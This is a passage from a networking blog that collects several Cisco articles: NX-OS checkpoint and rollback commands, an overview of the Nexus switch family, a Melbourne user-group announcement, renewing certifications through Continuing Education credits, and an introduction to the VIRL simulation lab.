N5k-UP(config)# rollback running-config checkpoint Checkpoint-1 ?
<CR>
atomic Stop rollback and revert to original configuration (default)
verbose Show the execution log

In addition, the Nexus 7000 and Nexus 9000 Series support the following extra rollback options:

  • Best-effort: Implement a rollback and skip any errors
  • Stop-at-first-failure: Implement a rollback that stops if an error occurs

The Nexus 3000 supports only the atomic rollback option.

Finally the rollback mechanism has been successfully applied and… 

N5k-UP(config)# rollback running-config checkpoint Checkpoint-1 verbose
Collecting Running-Config
Generating Rollback patch for switch profile
Rollback Patch is Empty
Note: Applying config parallelly may fail Rollback verification
Collecting Running-Config
#Generating Rollback Patch
Executing Rollback Patch
========================================================
`config t `
`interface Ethernet1/14 `
`no description *** TESTING CHECKPOINT FEATURE *** `
`exit`
`interface Ethernet1/13 `
`no description *** TESTING CHECKPOINT FEATURE *** `
`exit`
`interface Ethernet1/12 `
`no description *** TESTING CHECKPOINT FEATURE *** `
`exit`
`interface Ethernet1/11 `
`no description *** TESTING CHECKPOINT FEATURE *** `
`exit`
`interface Ethernet1/10 `
`no description *** TESTING CHECKPOINT FEATURE *** `
`exit`
========================================================
Generating Running-config for verification
Generating Patch for verification

At this point it seems like the rollback to the selected checkpoint was successful. We can verify this by checking to see if there is any description on Ethernet interfaces 1/10-14:

N5k-UP# sh interface ethernet 1/10-14 | include description
N5k-UP#

The rollback configuration test has been completed successfully.

Finally, to rollback using a checkpoint file located in the system’s bootflash we simply specify its location as shown below:

N5k-UP# rollback running-config file bootflash:///Checkpoint-11

Summary

This article serves as a configuration guide for the Nexus NX-OS checkpoint and rollback feature.  We have covered the main limitations and guidelines of this powerful Nexus NX-OS feature, demonstrated how to use the checkpoint & rollback feature and showed how to save checkpoints so they are not lost during a switch reboot or write erase. Finally, it is recommended that the configuration rollback procedure be used for managing change controls and notas a long term configuration management solution.

  • Hits: 50825
Introduction to Cisco Nexus Switches

Introduction to Cisco Nexus Switches – Nexus Product Family. Differences Between Nexus NX-OS & Catalyst IOS. Comparing High-End Nexus & Catalyst Switches

Introduction to Cisco Nexus Data Center SwitchesThis article introduces the Cisco Nexus product family (Nexus 9000, Nexus 7000, Nexus 5000, Nexus 3000, Nexus 2000, Nexus 1000V and MDS 9000). We explain the differences between Nexus and Catalyst switches but also compare commands, naming conventions, hardware capabilities etc. between Nexus NX-OS and Catalyst IOS operating systems. To provide a comprehensive overview we explain where each Nexus model is best positioned in the Data Center and directly compare high-end Nexus switches (Nexus 9000/7000) with high-end Catalyst switches (Catalyst 6800 / 6500) examining specifications, bandwidth – capacity, modules and features (High-Availability, Port Scalability, VDC, vPC – VSS, OTV, VXLAN, etc).

For our readers convenience we have made available for free download over 90 different datasheets in our Cisco Data Center download section.

Following are the topics covered in this article:

Additional Reading:

Cisco Nexus Product Family

The Cisco Nexus Family of products has become extremely popular in small and large data centers thanks to their capability for unifying storage, data and networking services. Thanks to the Cisco Fabric Interconnect they are able not only to support all these services but also provide a rock-solid programmable platform that fully supports any virtualized environment.  The Cisco Nexus family includes a generous number of different Nexus models to meet the demands of any Data Center environment. Let’s take a look at what the Nexus Family has to offer!

The Nexus Product Family

The Nexus Product Family

Cisco Nexus 9000 Series Switches

These data center switches can operate in Cisco NX-OS Software or Application Centric Infrastructure (ACI) modes. The main features of the new Cisco Nexus 9000 Series are: support of Fabric Extender Technology (FEX), virtual Port Channel (vPC), and Virtual Extensible LAN (VXLAN). There are a few key differences between the Cisco Nexus 7000 Series and Nexus 9000 DC switches. The Nexus 9000 supports Application Centric Infrastructure (ACI) in contrast to the Nexus 7000 switches.  However, the Cisco Nexus 9000 switches do not support the VDCs (Virtual Device Context) technology like the Nexus 7000 and the Nexus 9000 Series doesn't support storage protocols, in contrast to the Nexus 7000. Finally, it is foreseen that the Nexus 9000 will complement the Nexus 7000 as data centers transition to ACI.

The Nexus 9000 Series Data Center Switches

The Nexus 9000 Series Data Center Switches

The Nexus 9000 switches are available in a variety of models and configurations starting from the Nexus 9200 series (1 RU) Cloud Scale - standalone, Nexus 9300 series (1RU), Nexus 9300-EX (1RU) Cloud Scale standalone/ACI, Nexus 9500-EX (1RU) Cloud Scale Modules to the Nexus 9500 Cloud Scale switches (4, 8, 16 slots).

You can compare all available modes at the following URL:

https://www.cisco.com/c/en/us/products/switches/nexus-9000-series-switches/models-comparison.html

Download complete data sheets: Nexus 9500 series, Nexus 9300-EX series, Nexus 9300 series and Nexus 9200 series

Cisco Nexus 7000 Series Switches

They can provide an end-to-end data center architecture on a single platform, including data center core, aggregation, and access layer. The N7k series provides high-density 10, 40, and 100 Gigabit Ethernetinterfaces. The main features of the Cisco Nexus 7000 Series are: support for FEX, virtual Port Channel (vPC), VDC, MPLS and Fabricpath. In addition, the N7K supports fairly robust and established technologies for multi-DC interconnect (DCI) such as OTV and LISP.  The N9K does not support these well-established DCI technologies, but a newer DCI technology, VXLAN, BGP, EVPN, that can be deployed for site-to-site DCI.

The Nexus 7000 Series Data Center Switches

The Nexus 7000 Series Data Center Switches

The Nexus 7000 series consists of the 7000 and 7700 series switches, the latter being an updated series to the original 7000 series. The Nexus 7700 series offers higher bandwidth per slot (1.3Tbps compared to 550Gbps), greater performance and ability to support up to an impressive 192 100GE ports (7700 – 18 slot) compared to 96 100GE ports (7000 – 18 slot).

The Nexus 7000 is offered in 4, 9, 10 and 18 slot models while the 7700 comes in 2, 6, 10 and 18 slot models.

You can compare all available models at the following URL:

https://www.cisco.com/c/en/us/products/switches/nexus-7000-series-switches/models-comparison.html

Download complete data sheets: Nexus 7700 series or Nexus 7000 series

Cisco Nexus 5000 Series Switches

This product line is ideal for the DC access layer (End of Row), providing architectural support for virtualization and Unified Fabric environments. Cisco Nexus 5000 Series (N5k) can support VXLAN and comprehensive Layer 2 and 3 features for scaling data center networking. It supports Native Fibre Channel, Ethernet, and FCoE interfaces. The default system software includes most Cisco Nexus 5000 Platform features, such as Layer 2 security and management features. Licensed features include: Layer 3 routing, IP multicast, and enhanced Layer 2 (Cisco Fabric Path).

The Nexus 5000 Series Data Center Switches

The Nexus 5000 Series Data Center Switches

The Nexus 5000 series switches are available in two platforms: 10 Gbps and 40 Gbps. The 5600 Series 10 Gbps platform is capable of delivering up to 2.56 Tbps switching capacity while the 5600 Series 40 Gbps platform can squeeze up to an impressive 7.68 Tbps.

All units except the Nexus 5696Q (40 Gbps) occupy between 1 and 2 RUs space whereas the Nexus 5696Q requires a generous 4 RU of rack space.

Full comparison of all available models can be found here: https://www.cisco.com/c/en/us/products/switches/nexus-5000-series-switches/index.html - Note the 5000 series Nexus switches are now End-of-Sales / End-of-Support.

Download complete data sheets: Nexus 5500 series or Nexus 5600 series

Cisco Nexus 3000 Series Switches

The product family offers features such as latency of less than a microsecond, line-rate at Layer 2 & 3 unicastmulticast switching, and the support of 40 Gigabit Ethernet interfaces. The Cisco Nexus 3000 Series switches are positioned for use in environments with ultra-low latency requirements such as financial High-Frequency Trading (HFT), High-Performance Computing (HPC) and automotive crash-test simulation Applications.

The Nexus 3000 Series Data Center Switches

The Nexus 3000 Series Data Center Switches

The Cisco Nexus 3000 platform offers more than 15 models to satisfy all the switching needs an organization might have. The Nexus 3000 series offers switches starting with 1GE ports (Nexus 3000) and scales all the way up to 32 port 100GE ports with the Nexus 3232C model. Environments sensitive to delays will surely benefit from this series as they have been designed to practically eliminate any switching latency while at the same time offering large buffer spaces per port. Some models also have the ability to monitor their latency.

Full comparison can be found here: https://www.cisco.com/c/en/us/products/switches/nexus-3000-series-switches/models-comparison.html#~nexus3500

Download complete data sheets: Nexus 3000 series

Cisco Nexus 2000 Series Switches 

These integrate into existing data center networking infrastructures as well as the Cisco ACI setup. The Cisco Nexus 2000 Series (N2k) utilizes FEX technology to provide flexible data center deployment models and to meet the growing server demands. This series is a flexible and low cost solution to add access and server ports to a data center. The parent switch of an N2k switch can be a Nexus 5000, Nexus 7000 or Nexus 9000 series switch. With FEX technology deployed, all the configuration and management is performed on the parent switch. In particular the N2k, with FEX technology, acts as a remote line card of the parent switches.

The Nexus 2000 series switches

The Cisco Nexus 2000 platform offers over 10 models starting with a 24-port 1GE (Nexus 2224TP) all the way up to 48-port 1/10GE SFP/SFP+ (Nexus 2300).

Download complete data sheets: Nexus 2000 series

Cisco Nexus 1000v Series Switches

The Cisco Nexus 1000V Series (N1KV) is a software-based switch. It operates inside the VMware ESX hypervisor and utilizes the NX-OS Software. The Nexus 1000v architecture has two components: the Virtual Ethernet Module (VEM) and the Virtual Supervisor Module (VSM). These two components together make up the Cisco Nexus 1000V Series Switch, with the VSM providing the management plane and the VEM providing the data plane.

It should be noted that the Nexus 1000V Essential license is available at no cost and can provide various Layer 2 networking features.

Download complete data sheets: Nexus 1000v series

Cisco MDS 9000 SAN Switches

Cisco MDS 9000 Series Multilayer Switches are used to support Data Center SAN infrastructure. This series offers director-class platforms and Fabric switches. It utilizes the Cisco NX-OS software. Finally, the MDS 9000 can offer native fibre channel, storage services, and FCoE.

Download complete data sheets: MDS 9000 series

The Nexus Operating System – NX-OS Software

The Cisco NX-OS Software is a data center-class operating system that is built with modularity, resilience, and serviceability as its foundation. It is ideal for implementation within mission-critical data center environments where reliability and fault tolerance are very important. 

The NX-OS architecture can perform three different main functions of a Data Center by being able to process Layer 2, Layer 3, and storage protocols. Each service (feature) in NX-OS runs as a separate independent protected process. In particular, each non-kernel process runs in its own protected memory space, providing fault tolerance while isolating any issues that arise with that process. For instance, if a Layer 2 service such as RSTP (Rapid Spanning-Tree Protocol) fails, it will not affect any other services running at that time such as the Layer 3 EIGRP service. In addition, NX-OS is based on the Linux kernel taking advantage of the characteristics offered by the most reliable OS.

Most NX-OS features are not enabled by default to achieve optimum processing and memory utilization, so if it is needed to deploy a technology like UDLD, this feature should be enabled manually. It should be mentioned that NX-OS offers feature testing for a 120-day grace period. Using the grace period enables customers to test a feature prior to purchasing a license. 

A network engineer who is familiar with the traditional Cisco IOS command-line interface (CLI) will not face difficulties in using the NX-OS CLI for basic operations. The official Cisco Tool, Cisco IOS to NXOS Configuration Converter (required Cisco CCO account), can be helpful for the translation between CISCO IOS and NX-OS. This online tool is free and supports Catalyst 4900-6500 IOS configurations, which can be translated to NS-OS configuration for the Nexus 3000, Nexus 5000, Nexus 6000, Nexus 7000 and Nexus 9000 series.

Nexus NX-OS – Catalyst IOS Key Differences

There are key differences that should be understood prior to getting involved with the Cisco Nexus Operating System (NX-OS), these are highlighted below:

  • NX-OS uses a feature-based license model. Features such as Unidirectional Link Detection (UDLD) and Fibre Channel over Ethernet (FCoE) can be enabled via the feature configuration command. Configuration and verification commands for a specific feature are not available until that feature has been enabled.
  • NX-OS supports VDCs for Nexus 7000 platforms, which enables a physical device to be partitioned into logical devices. The default VDC is used when you log in for the first time.
  • By default, Secure Shell version 2 (SSHv2) is enabled and Telnet is disabled.
  • The default login administrator user is admin. It is no longer possible to login with just a password.
  • NX-OS uses a kickstart image and a system image. The kickstart image provides the Linux kernel and the system image provides the Layer 2/3 functionalities and features such as OTV, DHCP etc.
  • NX-OS supports Checkpoint & Rollback feature that allows the creation of configuration snapshots with the ability to rollback changes at any point without interrupting system functionality.
  • All Ethernet interfaces are called Ethernet. The FastEthernet, GigabitEthernet, TenGigabitEthernet interface naming conventions no longer exist.
  • The EtherChannel(IOS) naming convention has been replaced by Port-Channel (NX-OS).
  • The Write memory command is no longer available and has been replaced with the copy running-config startup-config.
  • Show commands can be executed identically from both the exec and config mode. e.g:
N7K (config)# show version
  • Show commands have parser help even in configuration mode.
  • Slash (forward-slash) notation supported for all IPv4/IPv6 masks. For instance:
N5K (config)# int e1/1  
N5K (config-if)# ip address 10.1.1.1/24
N5K (config-if)# ipv6 address ::1/120
  • Two configuration models exist for the routing protocols:

       - IGPs follow interface-centric model

       - BGP follows neighbor-centric model

In any case the NX-OS alias command syntax can be used to create an alias for a shortcut. For instance, to use the write IOS command in NX-OS to save the running configuration, the next alias can be used:

N5K (config)#cli alias name write copy running-config startup-config

This alias executing the write command will run the command copy running-config startup-config

High-End Switches: Nexus vs Catalyst

The Nexus product family is tailored mainly for Data Center environments and offers the following advantages over Catalyst Core switches:

  • Interfaces: Only the Nexus 7000 series has 100GbE line cards available. Catalyst 6500 & 6800 Core switches offer interfaces up to 40GbE.
  • Capacity: Nexus 7000 series (Nexus 7700) has a maximum system capacity ~42Tbps and the Nexus 9000 (9500 model) 60Tbps. In contrast, the maximum system capacity of the Catalyst 6800 is much lower ~6Tbps.
  • Port Scalability: The Nexus family is much more scalable than the Catalyst 6500/6800 regarding maximum port density of 1G, 10G & 40G ports.
  • High Availability (HA): Nexus products can utilize vPC technology, which is one of the most commonly used Nexus HA features and is similar to the Catalyst VSS mode. It is used to provide multi-chassis link aggregation. The key difference is that vPC does not rely on a unified control plane as the VSS setup, so both Nexus switches can operate independently.
  • The Nexus 7000 VDC feature offers the capability to partition the Nexus switch into multiple independent logical switches. There is no possible way for VDCs to communicate with each other, aside from physically connecting a physical port in one VDC to a port in another VDC. A maximum number of four VDC for a Supervisor 1 (SUP1) - or Supervisor 2 (SUP2) based system, and up to eight for a Supervisor 2 Enhanced (SUP2E) based system is supported. The VDC feature actually implements a separate control plane for each context. The VDC virtual technology feature offers the advantage of consolidating several network physical devices.
  • The Nexus 5000, 7000 9000 series family support the use of the Nexus 2000 Series Fabric Extenders to additionally expand the system and provide a large-scale virtual chassis in the data center. This unique feature of the Nexus switches can greatly simplify the management and operation of a data center network.
  • The Nexus 7000 series can support several DC interconnection technologies which are not applicable to the Catalyst 6500 6800 Core Switches. In particular, the Nexus 7000 Series supports the well-established technologies OTV, VXLAN and Fabric path.
  • The NX-OS is much more robust operating system than IOS. NX-OS is built with modularity, resilience, and service ability as its foundation.
  • The Nexus 7000 and 5000 series switches can implement Converge LAN/SAN Network setup by supporting storage protocols (FCFCoE) which are not supported by the Catalyst 6500 6800 switches.
  • The Nexus switches cannot accept service module line cards such as Firewall (FWSM) or Wireless (WISM) Service modules like the Catalyst 6500 6800 switches.
  • Finally, the Nexus switches do not support the NAT feature in contrast to the Catalyst 6500 6800

Nexus Basic Design Aspects – Where The Nexus and MDS Switches Fit In a Data Center

This section identifies the typical placement of the Cisco Nexus and MDS Families series switches in a Cisco Data Center.

Single-Tier Nexus Data Center Design

The Cisco Nexus 7000 Series can be used for both access and core layer connectivity in the single-tier data center architecture. The access layer connectivity for the servers can be provided with low cost 48-port Gigabit Ethernet linecards or with the 32-port 10 Gigabit Ethernet linecards if 10GE interfaces are required.

Single-Tier Nexus Data Center Topology

Single-Tier Nexus Data Center Topology

The single-tier data center architecture (shown above) can be expanded by connecting Cisco Nexus 2000 fabric extenders to Cisco Nexus 7000 Series switches to provide connectivity for the servers. It should be mentioned that the Nexus 2000 can be used only to provide connectivity to servers or end hosts and should not be connected with switches.  This setup would provide a Top-of-Rack (ToR) solution for the servers with a Cisco Nexus 7000 Series switch acting as the management point, and collapsing the accessaggregation, & core layers. It should be highlighted that if the budget is limited then the Nexus 9000 is the best alternative to the Nexus 7000. A pair of Nexus 5000 switches in a single-tier setup is a common low cost solution for small Data Centers.

Two-Tier Nexus Data Center Design

The two-tier data center option connects the Cisco Nexus 2000 Fabric Extenders to an upstream Cisco Nexus 5000 Series switch. The Cisco Nexus 5000 functions as an End-of-Row (EORaccess switch and is connected via multiple links to a pair of Cisco Nexus 7000 switches. This topology provides an access layer and a collapsed core and aggregation layer.

Two-Tier Nexus Data Center Topology

Two-Tier Nexus Data Center Topology

Three-Tier Nexus Data Center Design

The three-tier data center is similar to the two-tier data center architecture regarding the access layer and the placement of the Nexus 5000 and Nexus 2000 switches. However, multiple Nexus 7000 switches are used to the aggregation layer. The core layer is provided by a pair of Cisco Nexus 7000 Series switches:

Three-Tier Nexus Data Center Topology

Three-Tier Nexus Data Center Topology

The Nexus 9000 switches, due to their exceptional performance and comprehensive feature set, are versatile platforms that can be deployed in multiple scenarios such as  layered access-aggregation-core designsLeaf-and-spine architecture and Compact aggregation-layer solutions.

The Cisco MDS 9000 Series Multilayer Switches can provide the SAN connectivity at the accesslayer and the storage core layer. Connectivity between the SAN and LAN infrastructures to support FCoE would be supported through the Cisco Nexus 7000or 5000 seriesswitches and the Cisco MDS 9000 Series core layer.

Summary

This article introduced the Cisco Nexus product family. We explained how the Nexus platform differentiates from the well-known Catalyst switches and examined key-differences in the two platforms and operating systems (NX-OS – IOS).  We analyzed each Nexus series including the well-known MDS 9000 and showed how Single-Tier, Two-Tier and Three-Tier Data Center topologies make use of the Nexus platform. For more information including technical articles visit our Cisco Data Center section.

  • Hits: 149276
Cisco's First Official Australian User Group

Join Australia’s First Official Cisco Data Center User Group (DCUG) & Become Part of a Friendly Fast-Growing Professional Community That Meets Once a Month in Melbourne!

official-cisco-data-center-user-group-melbourne-australia-1It’s a reality – Australia now has its own Official Cisco Data Center User Group (DCUG) and it’s growing fast! Originally inspired by Cisco Champions Chris Partsenidis and Derek Hennessy, the idea was fully backed by Cisco Systems as they happened to be looking to start up something similar on a global scale.

The idea was born in the morning hours of the 18th of March 2016 over a hot cup of coffee when Chris Partsenidis and Derek Hennessy met for the first time, after Cisco’s Live! in Melbourne Australia. Both Chris and Derek agreed that it was time to create a friendly professional Cisco community group that would gather Cisco professionals and encourage users to share knowledge and experience.

The proposal was sent to Lauren Friedman at Cisco Systems, who just happened to be working on a similar concept on a global scale. Lauren loved the idea and, with her help, Australia got its first official Cisco Data Center User Group!

Becoming part of the Melbourne Cisco Data Center User Group is absolutely free and, by joining, you’ll be part of Australia’s first official Cisco user group, which is currently the largest in the world!

Where are the Meetings Held and What’s Included?

The user group will catch up on the first Tuesday of every month at the The Crafty Squire at 127 Russell Street in Melbourne CBD. We’ll be located upstairs in Porter Place. Our first meeting will be on Tuesday June 7th 2016 and all meetings will take place between 17:30 and 19:30.

For the duration of the meeting, we’ll have free beer for all registered members, food and if we are lucky – free Cisco beer mugs! The mugs are actually on their way from the USA and we are hoping to have them in time before the meeting otherwise we’ll be handing them out during the following meeting.

official-cisco-data-center-user-group-melbourne-australia-2

Figure 1. The Porter Place - Crafty Squire

For more details about our regular meet ups and join our community, head over to the Cisco Data Center User Group page on Meetup.com. 

We're really excited to start building a Data Center community in Melbourne so come along and join us!

Agenda – 7th of June 2016

Vendor Session: Infrastructure as Code and DevOps

Speaker: Chris Gascoigne - Technical Solutions Architect, Cisco Systems Melbourne, Australia

Chris Gascoigne is a Technical Solutions Architect with Cisco Systems working in the Australia/New Zealand Data Centre team. Chris has been with Cisco for nine years and specialises in Application Centric Infrastructure.

Community Session: GNS3 Connectivity

Speaker: Will Robinson - Senior Systems Engineer

Will Robinson is a Senior Systems Engineer and has extensive networking and data center experience. Will is an active community member and is the only Australian member of the NetAppATeam group.

  • Hits: 14108

Renewing Cisco Certifications without sitting for a Cisco Exam. Covers CCNA, CCNP, CCIE, CCDE and all Specialist Levels

cisco recertificationWithout a doubt, Cisco certifications and specializations are among the most popular vendor certifications in the IT industry, and earning them doesn’t come easy. Anyone who’s achieved a Cisco certification would be well aware of the countless hours required to cover the necessary curriculum, practice labs, and prepare for their Cisco exam.

Many would agree that one of the biggest headaches after achieving a Cisco certification is renewing it. Renewing or maintaining a Cisco certification usually requires the candidate to sit for an equal-level exam or pushing forward and aiming for a higher-level exam. While this might not be a problem for many professionals, many find it a big struggle. A significant amount of professionals decide not to renew their certifications because of the time and commitment required or because they’ve decided to focus on other vendors.

In this article, you’ll discover how you can easily renew any Cisco certification or specialization without sitting for a single exam! We’ll explain the different recertification paths, show how to select a recertification path, submit a claim, track the recertification process, open a support ticket, and more!

Key Topics:

Recertifying Cisco Certifications without Exams – How it Works

It is indeed possible to renew any Cisco certification without sitting for the dreaded exams, and it’s called the Cisco Continuing Education Program, and we’ll explain how it works.

The Cisco Continuing Education Program allows Cisco certified engineers to earn Continuing Education Credits (CE) that are then applied towards recertification. CEs can be earn via the following activities:

  • Instructor-Led Training
  • Cisco Digital Learning
  • Cisco Live! Training Sessions (BRK, LTR, TEC, DEVWks)
  • Cisco Network Academy Training
  • Other Activities such as workshops, bootcamps, etc

The amount of CE credits earned will depend on the type of activity and its duration. For example, you can earn 12 CE credits for a sitting through a 14-hour Cisco course delivered via the Cisco Digital Learning platform or earn a generous 40 to 65 credits for attending a 5-day Cisco Instructor-Led training course offered by authorized Cisco Learning Training Partners.

Once the training course or activity is complete, you submit a claim to earn the CE Credits. When you’ve gathered enough CE credits, you are automatically recertified.

How Many Cisco Learning Credits Do I Need?

The amount of Cisco Learning Credits required for your certification renewal depends on the level of recertification. For example, Associate level recertification, such as the CCNA, requires a minimum of 30 CE credits. In contrast, the Professional level (CCNP Enterprise, CCNP Data Center, etc.) requires 80 CE credits and CCIE level an impressive 120 Continuing Education credits.

The table below shows all available certification levels, duration, required Continuing Education credits, but also the ability to combine exams with Continuing Education credits to achieve recertification:

cisco recertification requirements

Recertification requirements must be met prior to the certification expiration date.

Combining Continuing Education credits and exams provides significant flexibility as it allows engineers to maximize their options and achieve recertification status easier with less stress.

Planning Your Cisco Recertification Strategy - Selecting a Course or Activity

When planning your recertification path, it’s crucial to have a strategy to help you achieve your goal the fastest way, therefore understanding how to search and browse through Cisco’s list of activities is very important.

You can browse through Cisco’s lists of activities by visiting the Cisco Continuing Education Program website and selecting Item Catalog from the menu as shown below:

cisco continuing education program selecting an activity

From here, you can search for a course name and use the various filters to find a suitable course. An easy way to look at your available options is to select the Category and Type of training, then click on Search to list all available training for the selected filters.

We’ve selected CCNP/CCDP Training (1) and Instructor-Led training (2) in the example below. This returned several different courses, delivery methods (Item type), and credits each course earns:

cisco continuing education program searching for an activity

By clicking on the View Details link on the right, we can obtain additional information about the course, where and when it’s delivered, and further filter our selection based on time-zone, dates, and more. Spending 15 minutes browsing through the Item Catalog list and using the various filters helps you better understand how to search for the course or activity that best suits you.

Claiming Cisco Education Credits

After selecting and completing an activity, you must register or claim the activity so that the Educational Credits are awarded to your account.

You must register/claim your activity within 90 days of completing it, or else you miss the opportunity to claim the credits.

To help illustrate how to claim your Educational Credits, we’ll use a real example below. In this case, the candidate has attended two Instructor-Led courses delivered by an authorized Cisco Training partner:

Course 1: Implementing and Configuring Cisco Identity Services Engine (SISE) 3.0, 40 Credits - Claimed

Course 2: Implementing and Operating Cisco Security Core Technologies (SCOR) 1.0, 64 CreditsUnclaimed

Note: We’ll cover below the complete process of claiming credits using Course 2 as an example.

Upon logging into Cisco’s Continuing Education Program website, the dashboard displays the first course (SISE 3.0), which was completed and successfully claimed, providing a total of 40 Credits:

cisco continuing education program my dashboard

Now it’s time to claim the second course, SCOR (1.0).

To begin, click on the Submit Items menu and enter the course details. When ready, click the Submit button:

cisco continuing education program submit items

The Cisco course attended was Implementing and Operating Cisco Security Core Technologies (SCOR) 1.0, delivered via Instructor Led Training method by an authorized Cisco Training partner.

As soon as the course details are submitted, a confirmation window appears. Double-check all details and click on Yes to submit the item:

cisco continuing education program submit items confirm

After a few minutes, we received an email confirmation containing the item and details that were submitted:

cisco continuing education program submit email confirmation

Viewing the main dashboard on the Cisco Continuing Education site, you’ll notice the newly submitted item is listed and in a Pending state. The course is eligible for 64 credits:

cisco continuing education program submitted item pending

Cisco next reaches out to the provider to verify the claim. Once this process is complete, Cisco approves the claim, credits are added to the account, and an email confirmation is sent informing us of the outcome:

cisco continuing education program email credit approval

The time required to process a claim is usually fast – one to two business days. However, if no response is received or the outcome is not the desired one, it is highly advisable to open a case using the Help menu item on the top right corner of the page:

cisco continuing education program open a support case

Certmetrics: Tracking – Verifying the Recertification Progress

Certmetric helps Cisco professionals to keep track of their certification progress, testing history, transcripts, download digital badges, and more. The site is accessible at the following URL: https://www.certmetrics.com/cisco/, and a link is also available from the main dashboard within the Cisco Continuing Education site.

Under the Certifications menu option, you’ll find all active and expired certifications. Select the certification for which you are recertifying, this is usually the highest certification as this automatically renews all others below it. In this example, we selected (clicked) the CCNP Enterprise:

certmetrics certification status before second course approval

The next window shows all paths for the CCNP Enterprise recertification. This maps to the recertification path options shown at the beginning of the article. 

Option 1: Satisfy one of the listed items between 1.1.1 – 1.1.2 or two items under 1.1.3.

Option 2: Satisfy one item under 1.2.1 and 1.2.2 (40 CE credits).

Option 3: Satisfy one item under 1.3 (80 CE credits).

ccnp enterprise progress report

Our preferred recertification path is 1.3. This requires 80 CE credits, of which 40 have already been claimed and awarded from the first course.

The above screenshot was taken after the 40 credit points from the first course were approved.

After the second item (course) has been approved, menu item 1.3 will be fully satisfied and show a total of 80 CE Credits (80/80).

Cisco Associate, Professional and Specialist Certs Successfully Renewed!

The below screenshot confirms that both Instructor Led Training courses were approved, earning us a total of 104 CE credits. We were able to successfully renew all Cisco certifications:

successfully recertified all cisco certifications final

We should note the certifications above set to expire in 2 and 69 days have been retired by Cisco and cannot therefore be renewed.

Summary

In this article we showed how it’s possible to recertify/renew your Cisco certifications without sitting for any Cisco exams. We explained how the recertification process works via the Continuing Education Program, how to calculate and earn Educational Credits (CE), calculate the required credits to recertify, search and claim your Educational Credits, your track your recertification progress and more.

  • Hits: 75597

Introduction to Cisco VIRL – Virtual Internet Routing Lab & Other Simulation Tools

Cisco VIRL – Virtual Internet Routing LabOne of the most difficult things for people who are starting out in a networking career is getting their hands on the equipment. Whether you are studying for Cisco certification or just wanting to test certain network behaviors in a lab, no one would argue that practicing is the best way to learn.

I have seen people spend hundreds or thousands of dollars (myself included) buying used networking equipment in order to build a home Cisco lab to gain practical experiences and study for certification exams. Until a few years ago it was the only option available, or you had to rent lab hours through one of the training companies.

Other Simulation Tools

GNS3 is a well-known free network simulation platform that has been around for many years. Cisco IOS on UNIX (IOU) is another option for running Cisco routers in a virtual environment. It is a fully working version of IOS that runs as a user mode UNIX (Solaris) process. IOU was built as a native Solaris image and runs just like any other program. One key advantage that Cisco IOU has is that it does not require nearly as much resources as GNS3 and VIRL would require. However, the legality of the source of Cisco images for GNS3 is questionable.

Cisco VIRL Network TopologyFigure 1. Cisco VIRL Network Topology (click to enlarge)

If you are not an authorized Cisco employee or trusted partner, usage of Cisco IOU is potentially a legal gray area. Because of lack of publicity and availability to average certification students and network engineers, online resources are limited and setting up a network takes much more effort. Also, due to missing features and delays in supporting the recent Cisco image releases, Cisco is not recommending them to engineers and students.

Read our review on "The VIRL Book" – A Guide to Cisco’s Virtual Internet Routing Lab (Cisco Lab)

Here Comes Cisco VIRL

Cisco Virtual Internet Routing Lab (VIRL) is a software tool Cisco developed to build and run network simulations without the need for physical hardware.

Under the hood, VIRL is an OpenStack-based platform that runs IOSv, IOSvL2, IOS XRv, NX-OSv, CSR1000v, and ASAv software images on the built-in hypervisor. VIRL provides a scalable, extensible network design and simulation environment using the VM Maestro frontend. Recently, I have seen extensive development and improvement made on the browser based operations using HTML5. VIRL also has extensive ability to integrate with third-party vendor virtual machines such as Juniper, Palo Alto Networks, Fortinet, F5 BigIP, Extreme Networks, Arista, Alcatel, Citrix and more.

VIRL comes in two different editions – Personal Edition and Academic Edition. Both have the same features except the Academic Edition is cheaper. At the time of writing, Academic Edition costs $79.99 USD per annum and Personal Edition costs $199.99 USD per year. VIRL has a license limit to simulate up to 20 Cisco nodes at a time. You can pay an extra $100 USD to upgrade to 30 Cisco nodes, maximum. To qualify to purchase the Academic Edition, you must be faculty, staff and students of any public or private K-12 institution or Higher Education institution. 

Cisco VIRL is community-supported and is designed for individual users. For enterprise users who want TAC support, in-depth documentation, training and more, there is Cisco Modeling Labs (CML), an enterprise version of VIRL. Of course the CML version costs much more.

Why VIRL Is Better

Official Cisco Images

VIRL comes with a complete set of legal and licensed Cisco IOS images that are the same as those running on physical routers. (I’m sure they were tweaked to optimize them running in a virtual environment). New Cisco IOS releases are provided on a regular basis.

Runs on Most Computers

The minimum hardware requirement for VIRL is an Intel-based computer with four CPU cores, 8GB of RAM and 70 GB free disk space. Of course more resources allow for larger simulations. Cisco suggests larger memory, such as 12GB for 20 nodes, 15GB for 30 nodes, or 18GB for 40 nodes. Each Cisco IOS-XRv node requires 3GB of memory to launch. In my experience, the only thing that is likely to stop you is the amount of memory installed on the computer. Computer memory is now inexpensive. You just need to ensure that your computer has enough empty slots to install additional memory.

Flexible Installation Options

You can install a VIRL on an enterprise-grade server infrastructure, a desktop computer, a laptop, or even on the cloud. You can run it as a Virtual Machine on VMware ESXi, VMware Workstation, Player or VMware Fusion for Mac OS. As opposed to running on a hypervisor, some choose to build VIRL on a bare-metal computer to achieve maximum performance.

Once your VIRL lab is up and running, it is an all-in-one virtual networking lab that has no wires and cords attached. When you run it as a VM, you can scale, migrate and implement high availability (HA) by taking advantage of the features that VMware infrastructure has to offer.

Automatic Configuration

The AutoNetkit, which comes with VIRL, can assign IP addresses to the nodes automatically when they launch, and it will even set up some basic routing protocols for you. The bootstrap configuration gives you a fully converged network as soon as they are launched. And you can go straight to the features and focus on what you want to test. This is a cool feature for network engineers who want to set up a one-time temporary environment to look up commands and test certain features. If you were building a network topology from scratch, or creating a mockup a production environment, manual IP addressing is recommended.

Community Support by Developers

VIRL is supported by a community full of good people like you. Questions are often answered first-hand by developers and engineers. The Cisco VIRL team offers monthly webinars and newsletters to keep the community updated on new feature releases and announcements. You can find the online community on Cisco Learning Network at: https://learningnetwork.cisco.com/groups/virl

About The Author

Jack Wang, CCIE #32450, is a principle network consultant and founder of Speak Network Solutions. He has been designing and implementing enterprise and large-scale service provider networks as well as teaching and blogging about advanced technologies. His current focus includes Software Defined Networking (SDN), data centers, Amazon AWS cloud integration, wireless, WAN architectures and design. Jack holds B.S. in Engineering and M.S. in Computer Science.

Summary

I wish VIRL had been available when I first started learning Cisco networking technology and taking CCIE exams. I have used GNS3, IOU and other simulation and emulation tools. They all had their advantages and disadvantages. When looking at them together, there are four main reasons I recommend VIRL to network engineers, certification students and trainers.

